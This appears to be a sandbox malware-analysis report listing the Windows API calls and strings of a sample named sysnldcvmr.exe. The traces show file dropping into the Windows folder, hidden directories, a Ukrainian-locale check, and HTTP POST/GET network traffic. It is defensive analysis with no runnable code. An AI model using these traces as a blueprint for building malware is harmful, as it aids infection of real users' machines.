                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3664088370-0
                                                                                                                                                                                                                                                    • Opcode ID: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                                                                                                                                                                                                    • Instruction ID: 8c00fedf36f089a4a79421f594ce94f1f5e858f4e01688578a9b7e0a2acaca41
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F01D75900208FBDB04DFA4D4557DEB7B4EF44304F14C5A9E819AB280E679AB58CB89
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040670F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406768
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                                                                                                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$C:\Windows\sysnldcvmr.exe$shell32.dll$shell32.dll
                                                                                                                                                                                                                                                    • API String ID: 2467965697-1186605320
                                                                                                                                                                                                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                                                                                                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406595
                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                                                                                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                                                                                                                                                                                                    • API String ID: 92872011-32713442
                                                                                                                                                                                                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                                                                                                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                    • String ID: oA$ oA$ oA
                                                                                                                                                                                                                                                    • API String ID: 2850889275-3725432611
                                                                                                                                                                                                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                                                                                                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                                                                                                                                                                                                    • strcmp.NTDLL ref: 0040E752
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocalestrcmp
                                                                                                                                                                                                                                                    • String ID: UKR
                                                                                                                                                                                                                                                    • API String ID: 3191669094-64918367
                                                                                                                                                                                                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                                                                                                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                                                                                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                                                                                                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040E518
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                                                                                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                                                                                                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                                                                    • String ID: PCOI$ilci$.ou
                                                                                                                                                                                                                                                    • API String ID: 2403999931-3537421359
                                                                                                                                                                                                                                                    • Opcode ID: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
                                                                                                                                                                                                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040DBE8
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                                                                    • String ID: <$GET
                                                                                                                                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                                                                                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                                                                                                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040CBEC,?), ref: 0040606F
                                                                                                                                                                                                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040CBEC,?), ref: 004062A8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\tbtcmds.dat$.ou
                                                                                                                                                                                                                                                    • API String ID: 1457358591-2669820434
                                                                                                                                                                                                                                                    • Opcode ID: 83d86ba9bf43733d3f94aa7f41c6e355e6d1358f9d97233fed313ad882293440
                                                                                                                                                                                                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83d86ba9bf43733d3f94aa7f41c6e355e6d1358f9d97233fed313ad882293440
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 671207744-0
                                                                                                                                                                                                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                                                                                                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
